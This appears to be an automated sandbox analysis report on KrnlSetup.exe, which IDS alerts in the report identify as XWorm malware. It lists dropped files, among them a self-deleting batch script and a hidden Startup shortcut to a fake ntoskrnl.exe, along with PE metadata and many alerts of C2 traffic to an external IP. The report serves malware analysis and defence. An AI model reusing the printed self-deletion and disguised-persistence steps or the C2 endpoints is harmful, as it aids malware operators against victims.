                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcdxynpw.1kp.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qe2e3z50.w5q.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvlfjrtv.mur.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwf2tjzt.100.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qysac01u.aq1.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sdc2igpl.oem.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrvl1md3.u43.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrclxqyp.zoe.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\KrnlSetup.exe
                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):150
                                                                              Entropy (8bit):5.028112349085952
                                                                              Encrypted:false
                                                                              SSDEEP:3:mKDDCMNqTtv3Dt+WfHvhs9uXZRQVkiwDwU1hGDt+kiE2J5xAInTRIJqZPy:hWKqTtLwQO9upRl9DNewkn23fTpk
                                                                              MD5:64EA01444BCEEFA3D7174A111270F55D
                                                                              SHA1:80BE3624E3780093DB9B3BA89B65EE3E1A35D4C9
                                                                              SHA-256:EFC80BEFF463761713DB696849A2B41E39EE2049D34699FBA0194F87BAF8536B
                                                                              SHA-512:131DA521C7830F2E2AB7E2BAC57A8A7F3EE36BA06CB7102693D0320C29215E93C6DEBB54F7F3D2E9D3ABE0CD49340483542C63A3730068F07D899944C079B4E6
                                                                              Malicious:false
                                                                              Preview:@echo off..timeout 3 > NUL..CD C:\Users\user\Desktop..DEL "KrnlSetup.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpF6F2.tmp.bat" /f /q..

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\KrnlSetup.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Dec 10 08:04:55 2024, mtime=Tue Dec 10 08:04:55 2024, atime=Tue Dec 10 08:04:55 2024, length=89600, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):670
                                                                              Entropy (8bit):4.614355425934263
                                                                              Encrypted:false
                                                                              SSDEEP:12:8l6qgcCy6keKN6+XjArb97NeD6b3nBmV:8G8DxzA/ei3nBm
                                                                              MD5:5737A23649199E68AC6E5CE7DD28A5FD
                                                                              SHA1:0725FA65D75328923CAAD50E0B03648776F7540F
                                                                              SHA-256:CE47A19F03F3F84EAE841538F581FA3C9A62AB5DA44A7113D60A37CFB494C7A0
                                                                              SHA-512:B411A26957EA1968079C9F723989DB7F3612066CE5F3A78315981A6B8528F1F6A86072D97D7A5BA5B5D41C804EA2C5BB98DBA3B1637982E76C0D9D36D880767F
                                                                              Malicious:false
                                                                              Preview:L..................F.... .....J.....J.....J...^...........................P.O. .:i.....+00.../C:\...................`.1......YyH. PROGRA~3..H......O.I.YyH....g.........................P.r.o.g.r.a.m.D.a.t.a.....f.2..^...Y.H ntoskrnl.exe..J......Y.H.Y.H....C.........................n.t.o.s.k.r.n.l...e.x.e.......J...............-.......I...........l........C:\ProgramData\ntoskrnl.exe..3.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.n.t.o.s.k.r.n.l...e.x.e.`.......X.......445817...........hT..CrF.f4... .tf.....,.......hT..CrF.f4... .tf.....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                              \Device\Null

                                                                              Download File
                                                                              Process:C:\Windows\System32\timeout.exe
                                                                              File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.41440934524794
                                                                              Encrypted:false
                                                                              SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                              MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                              SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                              SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                              SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                              Malicious:false
                                                                              Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):5.976406595215718
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              File name:KrnlSetup.exe
                                                                              File size:89'600 bytes
                                                                              MD5:493ac3e54bae1f0d5a31b68348352f6c
                                                                              SHA1:170c49a1115624e8fc5cafe7c33f76e54cf31c7a
                                                                              SHA256:c89625e4304d4708308a8a4138af28b90d490e8bd29ccdf3bc1f567d9644a7d7
                                                                              SHA512:5bad0866843dd49d0197f38f9f9a9ed745373b4cea2a6c70a1a1dc81b3ff8913b0b4825653be71e7b65b93886bb27419bd7d61045476fee13547f8d85acf65bb
                                                                              SSDEEP:1536:joG1/tjFDlZvSjvSr4wMiwTlVr6sQOvtbw++0W/QaIOAVg6h55OA34MKq5:joGjJD7EvBw7Y16sXvtbw+88OK5OA34C
                                                                              TLSH:EC937C1837F90525E2FF9FB00DF57696CA75F6632A03D25F108A018A1713A88CE917FA
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._Mg.................T...........q... ........@.. ....................................@................................

                                                                              File Icon

                                                                              Icon Hash:90cececece8e8eb0

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4171fe
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x674D5F9D [Mon Dec 2 07:19:57 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x171a40x57.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000x4d6.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a0000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000x152040x15400e970fdd02fb0a14ff56ad851b5256e1dFalse0.5965073529411765data6.0359861530406205IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x180000x4d60x600c0af2bb8a48129ec7ca88e3acbe03ef9False0.3763020833333333data3.7404644026258285IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x1a0000xc0x2009988ded23b35b558e2802297974b66c9False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_VERSION0x180a00x24cdata0.47278911564625853
                                                                              RT_MANIFEST0x182ec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-10T10:05:01.393762+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.449745149.154.167.220443TCP
                                                                              2024-12-10T10:05:14.455517+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1115.69.183.22237593192.168.2.449751TCP
                                                                              2024-12-10T10:05:14.479696+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449751115.69.183.22237593TCP
                                                                              2024-12-10T10:05:19.229984+01002853192ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound1192.168.2.449751115.69.183.22237593TCP
                                                                              2024-12-10T10:05:19.909745+01002853191ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound1115.69.183.22237593192.168.2.449751TCP
                                                                              2024-12-10T10:05:20.388438+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:20.388438+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:20.508839+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:20.508839+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:20.629374+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:20.629374+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:20.748806+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:20.748806+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:20.868343+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:20.868343+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:20.988429+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:20.988429+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.109747+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.109747+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.229755+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.229755+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.349751+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.349751+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.469250+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.469250+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.588749+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.588749+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.709750+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.709750+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.829229+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.829229+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.917850+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:21.917850+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.148168+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.148168+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.269031+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.269031+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.388499+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.388499+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.507997+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.507997+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.617874+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.617874+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.746512+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.746512+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.865936+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.865936+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:22.882125+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1115.69.183.22237593192.168.2.449751TCP
                                                                              2024-12-10T10:05:22.882125+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21115.69.183.22237593192.168.2.449751TCP
                                                                              2024-12-10T10:05:23.105359+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.105359+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.208331+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.208331+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.328595+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.328595+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.448019+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.448019+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:23.567924+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
